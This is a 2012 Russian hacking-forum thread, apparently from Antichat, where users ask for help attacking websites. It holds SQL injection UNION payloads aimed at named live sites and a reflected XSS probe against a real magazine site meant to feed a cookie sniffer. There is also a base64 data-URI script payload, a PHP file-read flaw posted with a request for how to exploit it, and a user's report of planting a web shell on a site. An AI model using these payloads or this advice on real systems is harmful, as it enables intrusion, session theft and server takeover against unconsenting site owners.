Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. SVAROG

    SVAROG Elder - Старейшина

    Joined:
    13 Feb 2007
    Messages:
    424
    Likes Received:
    86
    Reputations:
    -1
    Там же xss обычная
    [​IMG]
     
  2. c0n

    c0n New Member

    Joined:
    4 Feb 2006
    Messages:
    36
    Likes Received:
    2
    Reputations:
    0
    Я так и понял. :) Просто набрел случайно. Вот решил посмотреть, что с таким сделать можно.
     
  3. c0n

    c0n New Member

    Joined:
    4 Feb 2006
    Messages:
    36
    Likes Received:
    2
    Reputations:
    0

    Не на всех браузерах такое замечательное окошко всплывает. :) Вроде фильтрация еще имеет место быть.
    Спасибо.
    Когда-то давно был сниффер на античате. Пропал?
    Что можно сделать?
     
    #21523 c0n, 5 Dec 2012
    Last edited: 5 Dec 2012
  4. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    910
    Reputations:
    863
    Вот тебе снифер
    Только не спрашивай как его заюзать, а лудше почитай статьи про XSS!
     
    _________________________
  5. kise

    kise Member

    Joined:
    29 Jan 2012
    Messages:
    52
    Likes Received:
    5
    Reputations:
    -4
    Возможно задам довольно глупый вопрос, но как мне вывести запрос из mysql inj в нужной мне кодировке ?

    К примеру есть запрос:
    GET /index.php?sth=999999.9+union+all+select+text,2,3+from+art--

    При этом вывод из бд в кодировке UTF-8, а кодировка сайта WINDOWS-1251 (cp1251). Как мне сделать так, чтобы вывод был в кодировке cp1251 ?

    Вообще(вроде), это можно сделать так:
    SET NAMES cp1251
    SET CHARACTER SET cp1251

    Но как мне все это объединить в один запрос ?
     
  6. Zed0x

    Zed0x Member

    Joined:
    4 Jun 2012
    Messages:
    114
    Likes Received:
    29
    Reputations:
    23
    Здесь два варианта, либо юзать cast() или CONVERT(),либо шифровать и дешифровать данные, типа: unhex(hex(version())), в вашем случаи, это будет выглядеть так:
    /index.php?sth=999999.9+union+all+select+CONVERT(text+using+latin1),2,3+from+art--, либо же:
    /index.php?sth=999999.9+union+all+select+unhex(hex(text)),2,3+from+art--, и потом воспользоваться например: http://www.string-functions.com/hex-string.aspx для расшифровки полученного результата
     
  7. kise

    kise Member

    Joined:
    29 Jan 2012
    Messages:
    52
    Likes Received:
    5
    Reputations:
    -4
    /index.php?sth=999999.9+union+all+select+CONVERT("заголовок - "+USING+cp1251),CONVERT(title+USING+cp1251),3+from+art--

    Вот так, выводится заголовок из статьи правильно, но вот "заголовок-" => "скачать" . В чем проблема ?
     
  8. narviss

    narviss New Member

    Joined:
    1 Aug 2010
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Ограничение в строке на длину походу, вообще первый раз с таким фильтром встречаюсь.
     
  9. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    Отправь пост запрос

    http://www.fernando9torres.com

    p=1+and+0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--+
     
    _________________________
  10. c0n

    c0n New Member

    Joined:
    4 Feb 2006
    Messages:
    36
    Likes Received:
    2
    Reputations:
    0

    Как юзать знаю. :)
    Просто раньше на античате был рабочий онлайн сниффер. Теперь придется хостера искать :)
    Что делать знаю.
    Спасибо.
    А сниффер вот этот http://www.kanicq.ru/sniffer/
     
  11. mix0x0

    mix0x0 Active Member

    Joined:
    1 Nov 2010
    Messages:
    363
    Likes Received:
    189
    Reputations:
    92
    Давненько уже сниффер на ачате не наблюдается. Вы как будто с каменного века пришли :). Хостинг не проблема, если интересуют бесплатные варианты, то вот тема.
     
  12. blesse

    blesse Member

    Joined:
    18 Jan 2012
    Messages:
    175
    Likes Received:
    8
    Reputations:
    1
    Подскажите мануальчик: с описанием функций mysql (floor,mid,ansi, -- f ...)активно используемых в раскрутке скулей и обхода фильтрации /**/ () ....
     
  13. c0n

    c0n New Member

    Joined:
    4 Feb 2006
    Messages:
    36
    Likes Received:
    2
    Reputations:
    0

    Огромное спасибо за тему. :)
    Очень помогла :)

    Итак. Залил сниффер.
    Проверяем фильтрацию
    http://www.popmech.ru/templates/admin/functions/wysiwyg/admin_wysiwyg_iframe.php?area=full_area&dir=%22%3E%3C%3E=%28%29;/%22%22+%27%27?

    Ответ: <>=();/\"\" \'\'?">

    " - \"
    ' - \'
    + - удалился

    Соит ли дальше сражаться?

    Пробовал через инклуд js
    Через String.fromCharCode()

    Ничего не получается. :confused:
     
    #21533 c0n, 7 Dec 2012
    Last edited: 7 Dec 2012
  14. ReVOLVeR

    ReVOLVeR Banned

    Joined:
    2 Sep 2006
    Messages:
    170
    Likes Received:
    100
    Reputations:
    32
    c0n,
    _https://forum.antichat.ru/nextoldesttothread76143.html
    _http://www.securitylab.ru/analytics/274302.php
     
    #21534 ReVOLVeR, 7 Dec 2012
    Last edited: 7 Dec 2012
  15. c0n

    c0n New Member

    Joined:
    4 Feb 2006
    Messages:
    36
    Likes Received:
    2
    Reputations:
    0

    За ссылки огромное спасибо. :) Вроде работает :)

    НО:
    1) Выпадает ряд браузеров (IE, Chrome - у мну не завелся)
    2) Доступна по конструкции типа
    Code:
    <a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgn9fX1Jyk8L3NjcmlwdD 4=">Ссылко в Сибирь</a>
    Других вариантов использования не нашел.
     
  16. ReVOLVeR

    ReVOLVeR Banned

    Joined:
    2 Sep 2006
    Messages:
    170
    Likes Received:
    100
    Reputations:
    32
    c0n, прояви си) напиши админу, не работает ссылка в опере и твоя xss
     
    3 people like this.
  17. c0n

    c0n New Member

    Joined:
    4 Feb 2006
    Messages:
    36
    Likes Received:
    2
    Reputations:
    0
    По работоспособности

    Писал. Там то ли не понимают, то ли не хотят понять.
     
  18. zloy_fantom

    zloy_fantom New Member

    Joined:
    3 Dec 2012
    Messages:
    46
    Likes Received:
    0
    Reputations:
    0
    Последовал вашему совету, вот скрипт:
    Code:
    <?  /* // +--------------------------------------------------------------------------+ // | 
    Project:    TBDevYSE - TBDev Yuna Scatari Edition                        | // 
    +--------------------------------------------------------------------------+ // |
     This file is part of TBDevYSE. TBDevYSE is based on TBDev,               | // | originally by RedBeard of TorrentBits, extensively modified by         
      | // | Gartenzwerg.                                                             | // 
    |                                                                      
        | // | TBDevYSE is free software; you can redistribute it and/or modify      
       | // | it under the terms of the GNU General Public License as published by  
       | // | the Free Software Foundation; either version 2 of the License, or    
        | // | (at your option) any later version.                                  
        | // |                                                                          | // | TBDevYSE is distributed in the hope that it will be useful,           
       | // | but WITHOUT ANY WARRANTY; without even the implied warranty of          
     | // | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the            | // | GNU General Public License for more details.                            
     | // |                                                                        
      | // | You should have received a copy of the GNU General Public License      
      | // | along with TBDevYSE; if not, write to the Free Software Foundation,     
     | // | Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA           
     | // +--------------------------------------------------------------------------+ 
    // |                                               Do not remove above lines! | // 
    +--------------------------------------------------------------------------+ */  
    $pic = htmlspecialchars((string) $_GET["pic"]);
     readfile("torrent_files/images/$pic");
     die();
     require "include/bittorrent.php";
     dbconn(false);
      loggedinorreturn();
       stdhead("Просмотр картинки");
     print("<h1>$pic</h1>\n");
     print("<p align=center><img src=\"torrent_files/images/$pic\"></p>\n");
     ?>  <h3 align=center><a href="javascript: history.go(-1)">Назад</a></h3>  <? stdfoot();
     ?>
    Как его можно использовать? Спасибо
     
    #21538 zloy_fantom, 8 Dec 2012
    Last edited: 8 Dec 2012
  19. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    Code:
    $pic = htmlspecialchars((string) $_GET["pic"]);
     readfile("torrent_files/images/$pic");
    ReadFile как бы намекает что это только читалка файлов.
     
    _________________________
    3 people like this.
  20. zloy_fantom

    zloy_fantom New Member

    Joined:
    3 Dec 2012
    Messages:
    46
    Likes Received:
    0
    Reputations:
    0
    Прошу прощения, что задаю дурацкие вопросы, но сам пода не могу дотумкать:
    разместил-таки шелл на сайте, подключившись через openVPN по адресу:
    //ххх.ххх.ххх.ххх/shell.php
    Но при попытке его запустить получаю следующее:
    file://ххх.ххх.ххх.ххх/shell.php
    Как следствие, получаю его код, если-же вписать в адресную стоку http://ххх.ххх.ххх.ххх/shell.php то происходит редирект:
    http://site/shell.php и выводится: "No input file specified."
    Как-же его все-таки запустить? Спасибо
    Да, может это важно, если отключиться от openVPN, то указанный ip не доступен
     
    #21540 zloy_fantom, 9 Dec 2012
    Last edited: 9 Dec 2012
Thread Status:
Not open for further replies.